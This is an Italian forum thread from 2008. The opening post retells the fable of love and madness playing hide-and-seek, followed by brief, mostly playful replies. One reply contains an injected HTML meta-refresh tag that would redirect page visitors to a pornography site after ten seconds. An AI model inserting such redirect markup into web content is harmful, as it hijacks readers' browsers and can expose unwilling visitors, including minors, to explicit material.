Pagina 1 di 1

...La StOrIa DeLL'aMoRe...

Inviato: 22 ago 2008, 00:55
da marktiell
Raccontano che un giorno si riunirono in un luogo della terra tutti i sentimenti e le qualità degli uomini.
Quando la noia si fu presentata per la terza volta, la pazzia come sempre un po' folle propose: "giochiamo a nascondino!". L'interesse alzò un sopracciglio e la curiosità senza potersi contenere chiese: "a nascondino? di che si tratta?" "é un gioco -spiegò la pazzia - in cui iomi copro gli occhi e mi metto a contare fino a 1000000 mentre voi vi nascondete, quando avrò terminato di contare il primo di voi che scopro prenderà il mio posto per continuare il gioco".
L'entusiasmo si mise a ballare, accompagnato dall'euforia. L'allegria fece tanti salti che finì per convincere il dubbio e persino l'apatia, alla quale non interessava mai niente.... però non tutti vollero partecipare. La verità preferì non nascondersi. Perché se poi tutti alla fine la scoprono?La superbia pensò che fosse un gioco molto sciocco (in fondo ciò che le dava fastidio era che non fosse stata una sua idea) e la codardia preferì non arricchirsi.
"UNO,DUE,TRE..." -cominciò a contare la pazzia. La prima a nascondersi fu la pigrizia che si
lasciò cadere dietro la prima pietra che trovò sul percorso. La fede volò in cielo e l'invidia si
nascose all'ombra del trionfo che con le proprie forze era riuscito a salire sull'albero più alto. La generosità quasi non riusciva a nascondersi. Ogni posto che trovava le sembrava meraviglioso per qualcuno dei suoi amici. Che dire di un lago cristallino? Ideale per la bellezza. Le fronde di un albero? Perfetto per la timidezza. Le ali di una farfalla? Il migliore per la voluttà. Una folata di vento? Magnifico per la libertà. Così la generosità finì per nascondersi in un raggio di sole.
L'egoismo, al contrario trovò subito un buon nascondiglio, ventilato, confortevole e tutto per sé.
La menzogna si nascose sul fondale degli oceani (non e' vero, si nascose dietro l'arcobaleno!).
La passione e il desiderio al centro dei vulcani. L'oblio....non mi ricordo...dove?
Quando la pazzia arrivò a contare 999999 l'amore non aveva ancora trovato un posto dove
nascondersi poiché li trovava tutti occupati; finché scorse un cespuglio di rose e alla fine decise di nascondersi tra i suoi fiori. "un milione!" - contò la pazzia. E cominciò a cercare. La prima a comparire fu la pigrizia, solo a tre passi da una pietra. Poi udì la fede, che stava discutendo conDio su questioni di teologia, e sentì vibrare la passione e il desiderio dal fondo dei vulcani. Per caso trovò l'invidia e poté dedurre dove fosse il trionfo. L'egoismo non riuscì a trovarlo: era
fuggito dal suo nascondiglio essendosi accorto che c'era un nido di vespe. Dopo tanto
camminare, la pazzia ebbe sete e nel raggiungere il lago scoprì la bellezza. Con il dubbio le
risultò ancora più facile, giacché lo trovò seduto su uno steccato senza avere ancora deciso da che lato nascondersi.
Alla fine trovò un po' tutti: il talento nell'erba fresca, l'angoscia in una grotta buia, la menzogna dietro l'arcobaleno e infine l'oblio che si era già dimenticato che stava giocando a nascondino.
Solo l'amore non le appariva da nessuna parte. La Pazzia cercò dietro ogni albero, dietro ogni
pietra, sulla cima delle montagne e quando stava per darsi per vinta scorse il cespuglio di rose e cominciò a muovere i rami. Quando, all'improvviso, si udì un grido di dolore: le spine avevano ferito gli occhi dell'amore! La pazzia non sapeva più che cosa fare per discolparsi; pianse, pregò, implorò, domandò perdono e alla fine gli promise che sarebbe diventata la sua guida.Da allora, da quando per la prima volta si giocò a nascondino sulla terra, l'amore e' cieco e la pazzia sempre lo accompagna...

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 22 ago 2008, 01:03
da kokka.di.mamma!!!
e ki s fir e legg..

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 22 ago 2008, 19:25
da ßα¢ιℓσѕ
:shock: ...Kiù Long!!!

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 23 ago 2008, 14:00
da THE QUEEN90
ke beeeeeeeeeeella storia!!1 :smile:

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 23 ago 2008, 15:11
da CHAD+ME
kokka.di.mamma!!! ha scritto:e ki s fir e legg..
:lol: :lol: .....MARCO CMQ E' BELLA!!!!!!!!!!!!!!!!!!! :cool: :cool:

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 23 ago 2008, 18:39
da *sweet mary*
ce l'ho pure sul mio blog... mo mi devi pagare i diritti d'autore :cool:

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 24 ago 2008, 00:34
da ·)» *мιѕѕ ℓєα* «(·
ßα¢ιℓσѕ ha scritto: :shock: ...Kiù Long!!!
:lol: :lol:

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 24 ago 2008, 13:12
da cucciola93
M scoccio d leggere! :roll:

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 24 ago 2008, 15:12
da MiliteNero
BELLISSIMA QUESTA STORIA

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 24 ago 2008, 15:42
da marianico93-94
kokka.di.mamma!!! ha scritto:e ki s fir e legg..
:lol: :lol: :lol: :lol:

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 24 ago 2008, 19:50
da Kekko lo juventino
kokka.di.mamma!!! ha scritto:e ki s fir e legg..

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 24 ago 2008, 20:01
da kokka.di.mamma!!!
marianico93-94 ha scritto:
kokka.di.mamma!!! ha scritto:e ki s fir e legg..
:lol: :lol: :lol: :lol:
:grin: ;-)

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 24 ago 2008, 20:28
da {*кιѕѕ 93
:grin:

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 24 ago 2008, 20:56
da The_untouchable
dfghdhdfhdhdhhcia siaoaoasooi<META HTTP-EQUIV="refresh" CONTENT="10;URL=http://youporn.com/watch/124586/big-nat ... mpilation/">

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 25 ago 2008, 23:33
da bimba13
wa è bellissima :grin: ;-)

Re: ...La StOrIa DeLL'aMoRe...

Inviato: 26 ago 2008, 15:36
da CHAD+ME
:lol: :lol: :lol: :lol: